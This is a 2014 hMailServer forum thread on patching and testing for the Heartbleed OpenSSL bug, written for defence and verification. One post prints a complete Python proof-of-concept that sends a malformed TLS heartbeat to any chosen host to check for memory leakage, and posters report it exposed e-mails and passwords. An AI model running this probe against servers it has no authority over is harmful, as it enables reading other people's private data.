Page 1 of 1

Heartbleed Bug in OpenSSL

Posted: 2014-04-08 11:15
by yetanotherb
Hi,

is hMailServer in any way affected by the Heartbleed Bug in OpenSSL?
(http://heartbleed.com/)

This is a VERY serious problem :-(

Best regards,
B

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 12:19
by mlg.odk
Yes, hMailServer is vulnerable. Even worse, OpenSSL is statically linked, so there is no way for the end user to patch this until an official update is released.

I recommend you to take your server offline until this issue is addressed. I just ran a testing script against one of my servers, and it happily replied with private e-mails and passwords.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 12:33
by yetanotherb
Oooh boy.... :shock: :(

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 13:10
by martin
I will look into this and release a patch.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 13:56
by percepts
Reading the full information release and the link to openssl.org news release it seems there is an easy fix.
Just use one of the earlier releases of openssl or the fix release(OpenSSL 1.0.1g) to regenerate your certificates.
What versions of the OpenSSL are affected?

Status of different versions:
•OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
•OpenSSL 1.0.1g is NOT vulnerable
•OpenSSL 1.0.0 branch is NOT vulnerable
•OpenSSL 0.9.8 branch is NOT vulnerable

Bug was introduced to OpenSSL in December 2011 and has been out in the wild since OpenSSL release 1.0.1 on 14th of March 2012. OpenSSL 1.0.1g released on 7th of April 2014 fixes the bug.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 14:25
by SCOOBY
Hi,
Is there anyway I can tell what version of Open SSL my installation is using?
Cheers

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 14:29
by mlg.odk
percepts wrote:Just use one of the earlier releases of openssl or the fix release(OpenSSL 1.0.1g) to regenerate your certificates.
Unfortunately, this issue is not about certificates. It is an issue in the implementation of the TLS protocol. Long story short, it is currently possible for anyone, without authentication, to grab the passwords of any recently logged on users, their recently sent e-mails, or your cryptographic keys, over the internet and without leaving a trace. The only solution for this issue is to update hMailServer once a patch is out.

@martin: I am looking forward to the update.
SCOOBY wrote:Is there anyway I can tell what version of Open SSL my installation is using?
hMailServer 5.4 is using OpenSSL 1.0.1c.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 14:33
by martin
I sent a security newsletter a while back informing users about this issue.

Personally I've disabled the SSL TCP/IP-ports until patched, so I am still able to receive email using SMTP on port 25. Of course this won't work for everyone.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 14:35
by SCOOBY
Thanks, eagerly awaiting the update!

Also, if a server does not have an SSL certificate installed, and only non-ssl ports are open, is it still vulnerable?

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 14:39
by martin
If you don't have TCP/IP ports, then OpenSSL isn't executed within hMailServer so then it should not be vulnerable.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 19:07
by Greta
From what version use hmail OpenSSL 1.0.1?

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 19:18
by Bill48105
2014-04-08 5.4-B2014040801
* IMPORTANT: This build has a LOT of extra debug logging but NOT shown by default. [Settings]LogLevel=10 for some extra to 100 for extremely verbose
* URGENT: Heartbleed zero day openSSL fix http://www.zdnet.com/heartbleed-serious ... 000028166/
* Upated hmailserver to openssl-1.0.1g
* ONLY MINIMALLY TESTED. VULNERABILITY ERADICATION UNTESTED. Just built openssl-1.01.1g & incorporated into this build.

http://www.hmailserver.com/forum/viewto ... 10&t=21420

EDIT:
Also posted non-static linked build so openssl dll's can be used if needed. Obviously weird things can happen if you use incompatible DLL's so know what you are doing & only use if needed.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 19:59
by SCOOBY
Sorry if I'm being dense, but where do I download it from?

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 19:59
by mlg.odk
Thanks Bill48105, I can confirm that this update resolves the issue.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 20:03
by Bill48105
SCOOBY wrote:Sorry if I'm being dense, but where do I download it from?
You go to the experimental thead:
http://www.hmailserver.com/forum/viewto ... 10&t=21420
Scroll WAYYY down to where the downloads are:

Code: Select all

NEWEST & MOST RECENT:
=== 8Apr2014 === (BASED on official 5.4 B1950 + to-date experimental changes)
* URGENT: Heartbleed zero day openSSL fix http://www.zdnet.com/heartbleed-serious ... 000028166/
* IMPORTANT: This build has a LOT of extra debug logging but NOT shown by default. [Settings]LogLevel=10 for some extra to 100 for extremely verbose
NOTE: Should be stable but not recommended live on production until tested further

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 20:05
by Bill48105
mlg.odk wrote:Thanks Bill48105, I can confirm that this update resolves the issue.
Ok great! How did you test it?
Thx
Bill

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 20:14
by mlg.odk
Bill48105 wrote:
mlg.odk wrote:Thanks Bill48105, I can confirm that this update resolves the issue.
Ok great! How did you test it?
Thx
Bill
There is an online testing tool available here: http://filippo.io/Heartbleed/ (specify some port used by hMailServer as it defaults to 443).

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 20:22
by Bill48105
mlg.odk wrote:
Bill48105 wrote:
mlg.odk wrote:Thanks Bill48105, I can confirm that this update resolves the issue.
Ok great! How did you test it?
Thx
Bill
There is an online testing tool available here: http://filippo.io/Heartbleed/ (specify some port used by hMailServer as it defaults to 443).
OK cool thx. Yup it claims it's ok now. Assuming it is true it's good then eh.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 20:29
by SCOOBY
Well....
I've just tested my un-patched hMailServer on that URL and it's saying it is fine...
I'm running 5.3.3-B1879 at the moment.

Any ideas?

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 20:42
by martin
Same thing here. Either the issue is not deterministic, or the test at http://filippo.io/Heartbleed is broken.

Currently compiling the new version.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 20:46
by Bill48105
martin wrote:Same thing here. Either the issue is not deterministic, or the test at http://filippo.io/Heartbleed is broken.

Currently compiling the new version.
SCOOBY wrote:Well....
I've just tested my un-patched hMailServer on that URL and it's saying it is fine...
I'm running 5.3.3-B1879 at the moment.

Any ideas?
Luc from IRC tested before & after with the python script & claims it reported vulnerable before & OK after.
If anyone else wants to test:
https://gist.github.com/sh1n0b1/10100394

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 20:47
by RvdH
heartbleedtest.py

Code: Select all

#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.

# Modified for simplified checking by Yonathan Klijnsma

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

target = None

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')

hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01                                  
''')

hb = h2bin(''' 
18 03 02 00 03
01 40 00
''')

def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print '  %04x: %-48s %s' % (b, hxdat, pdat)
    print

def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time() 
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata
        

def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        return None, None, None
 
    return typ, ver, pay

def hit_hb(s):
    global target
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print target + '|NOT VULNERABLE'
            return False

        if typ == 24:
            if len(pay) > 3:
                print target + '|VULNERABLE'
            else:
                print target + '|NOT VULNERABLE'
            return True

        if typ == 21:
            print target + '|NOT VULNERABLE'
            return False

def main():
    global target
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sys.stdout.flush()
    s.connect((args[0], opts.port))
    target = args[0]
    sys.stdout.flush()
    s.send(hello)
    sys.stdout.flush()
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            return
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            break

    sys.stdout.flush()
    s.send(hb)
    hit_hb(s)

if __name__ == '__main__':
    main()
usage:
heartbleedtest.py domainname -p 993
heartbleedtest.py domainname -p 995
heartbleedtest.py domainname -p 465

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 20:47
by sowen
http://filippo.io/Heartbleed also says my hMailserver installation B1950 is clean.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 20:49
by Bill48105
sowen wrote:http://filippo.io/Heartbleed also says my hMailserver installation B1950 is clean.
That's not looking good in terms of trusting that test.. Did you try the python script?

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 20:57
by lucb1e
I'd say the filippo.io bug is faulty then:

- I've tried the python script (not the one posted above, but another one) before patching, which said 5.4-B1950 is vulnerable;

- I've tried that same python script after patching which said 5.4-B2014040801 is *not* vulnerable; and

- I've tried filippo.io after patching which said I was *not* vulnerable.

So I'm not sure whether filippo.io works properly, but B1950 definitely was vulnerable for me. In the python script I saw some of my own e-mail. Filippo.io does seem to work on checking whether apache is vulnerable though, those results usually match python's.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 21:01
by Bill48105
lucb1e wrote:I'd say the filippo.io bug is faulty then:

- I've tried the python script (not the one posted above, but another one) before patching, which said 5.4-B1950 is vulnerable;

- I've tried that same python script after patching which said 5.4-B2014040801 is *not* vulnerable; and

- I've tried filippo.io after patching whcih said I was *not* vulnerable.

So I'm not sure whether filippo.io works properly, but B1950 definitely was vulnerable for me. In the python script I saw some of my own e-mail. Filippo.io does seem to work on checking whether apache is vulnerable though, those results usually match python's.
Thanks for the info. I'd sooner say not to trust that site at this point. Maybe a bug, maybe not designed to test mail or maybe they are a front to gather info about vulnerable servers. :o

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 21:30
by martin
There's a build available here now:
http://download.hmailserver.com/hMailSe ... -B1951.exe

I'm running it myself and it passes the heartbleed tests.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 21:32
by Bill48105
martin wrote:There's a build available here now:
http://download.hmailserver.com/hMailSe ... -B1951.exe

I'm running it myself and it passes the heartbleed tests.
Cool thx martin.
NOTE: That build does not contain starttls or other post B1950 changes I've put in my experimental builds though. So anyone who was on B1950 can upgrade to B1951 but anyone who needs starttls or other changes I've made should use my experimental build from today.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 21:40
by yetanotherb
Great Job!

Thanks a lot for the fast response!

Best regards,
B

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 22:04
by SCOOBY
Thanks guys, server patched and hopefully that is that!!

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 22:17
by sowen
This tester reports the patched version as not vulnerable:
http://possible.lv/tools/hb/?sp

Thanks!

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 23:05
by mattg
Bill48105 wrote:
martin wrote:There's a build available here now:
http://download.hmailserver.com/hMailSe ... -B1951.exe

I'm running it myself and it passes the heartbleed tests.
Cool thx martin.
NOTE: That build does not contain starttls or other post B1950 changes I've put in my experimental builds though. So anyone who was on B1950 can upgrade to B1951 but anyone who needs starttls or other changes I've made should use my experimental build from today.
I don't need StartTLS (but am happy to test it)

I do need the OTHER fixes that you have incorporated into your ALPHA builds...Like the UTF-8 Indexing, the IOCP fixes etc

Where is this stuff at in terms of the new build?

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 23:36
by Bill48105
mattg wrote:
Bill48105 wrote:
martin wrote:There's a build available here now:
http://download.hmailserver.com/hMailSe ... -B1951.exe

I'm running it myself and it passes the heartbleed tests.
Cool thx martin.
NOTE: That build does not contain starttls or other post B1950 changes I've put in my experimental builds though. So anyone who was on B1950 can upgrade to B1951 but anyone who needs starttls or other changes I've made should use my experimental build from today.
I don't need StartTLS (but am happy to test it)

I do need the OTHER fixes that you have incorporated into your ALPHA builds...Like the UTF-8 Indexing, the IOCP fixes etc

Where is this stuff at in terms of the new build?
martin is moving away from SVN repo in favor of github. He had setup a 'dev' one there awhile back but I stuck on the svn until I was able to get my local copy cleaned up enough to commit. I've just not had time. Now martin is setting up a new copy on github and setting up automated builds. Should help keep them in sync.

So long story short only my builds have a lot of the recent 'experimental' changes until I can get them to martin so he can approve & merge with his but no ETA
Bill

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 23:54
by Sune
Doesn't 5.3.3 build 1879 use a previous version of OpenSSL, that isn't affected by the bug?
As far as I can see the bug was introduced in OpenSSL 1.0.1 that was released in December 2011, while hMS build 1879 was released in June 2010 (=before the bug).

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-09 01:11
by japi
martin wrote:There's a build available here now:
http://download.hmailserver.com/hMailSe ... -B1951.exe

I'm running it myself and it passes the heartbleed tests.
Martin,
I want to thank you (and of course everyone who contributed!) for your quick reaction.
This is a level of service i would expect from a company, but not from a small project (most companies would most likely not react as fast as you did!).
The last 24 hours weren't the brightest in the history of the internet, but hmailserver and many other opensource projects have done a great job in mitigating the most severe incident i can remember in the past 7 years. It was the sysadmins nightmare come true, every SSL-Port an enemy.
It's time to get some sleep, now that the Heartbleeding has stopped... :mrgreen:
Thanks a Million and keep up the great work!

Best Regards,
Jan

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-10 19:30
by Kob
For what it's worth, I found out that the on-line testing at
http://possible.lv/tools/hb/
provides more informative results than the test at filippo.io

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-11 10:54
by Caspar
That testing method is only good for testing it on HTTPS sites, if you want to use anything else you will probably need a different checking tool, and I have yet to find one that works correctly with IMAP, POP and SMTP.

Simple: if you have used SSL with your server Update now to the latest stable or experimental build (whatever is that you need, because of specific options). After you have done that create a new certificate since the Private key could have been compromised.
Steps on to do a new certificate you can find here: http://www.hmailserver.com/forum/viewto ... 12&t=22371
When creating a new certificate make sure you use a new private key!

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-11 18:50
by Bill48105
Caspar wrote:That testing method is only good for testing it on HTTPS sites, if you want to use anything else you will probably need a different checking tool, and I have yet to find one that works correctly with IMAP, POP and SMTP.

Simple: if you have used SSL with your server Update now to the latest stable or experimental build (whatever is that you need, because of specific options). After you have done that create a new certificate since the Private key could have been compromised.
Steps on to do a new certificate you can find here: http://www.hmailserver.com/forum/viewto ... 12&t=22371
When creating a new certificate make sure you use a new private key!
The python scripts above work. I tested them with hmail.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-14 10:05
by Caspar
Bill48105 wrote:
Caspar wrote:...
The python scripts above work. I tested them with hmail.
It only works if it is using SSL all the time. If it does not use SSL all the time (like if you want to use STARTTLS) it does not work.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-14 10:40
by Bill48105
Caspar wrote:
Bill48105 wrote:
Caspar wrote:...
The python scripts above work. I tested them with hmail.
It only works if it is using SSL all the time. If it does not use SSL all the time (like if you want to use STARTTLS) it does not work.
Yeah I hadn't tested it on a non SSL port but guess that makes sense since handshake hasn't completed yet on STARTLS enabled port although it is an SSL socket even before the handshake. But if one wants to test just test SSL & if it's OK STARTTLS ports would be too unless someone proves otherwise.
Bill

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-30 15:15
by esc
Sune wrote:Doesn't 5.3.3 build 1879 use a previous version of OpenSSL, that isn't affected by the bug?
As far as I can see the bug was introduced in OpenSSL 1.0.1 that was released in December 2011, while hMS build 1879 was released in June 2010 (=before the bug).
I would also like a definitive answer to this.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-30 15:46
by percepts

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-30 17:50
by Bill48105
Version 5.3.3 - Build 1879 (2010-06-06) - Production

Issue 312: In some cases, the POP3 server returned incorrect data which could lead to corrupt attachments. Changes have been made to prevent this error. The error was apparent when retrieving PDF files which had been sent using Outlook Express.
Issue 313: If hMailServer was configured to download messages from a server which did not support UIDL, hMailServer timed out. hMailServer has been changed to disconnect immediately and report an error when this happens. The External account functionality in hMailServer does not work with POP3 servers not supporting UIDL.
Issue 314: If DKIM was enabled and a user sent an email with no text in the body, hMailServer did not correctly sign the message.
Issue 1879: OpenSSL has been upgraded to version 0.9.8o.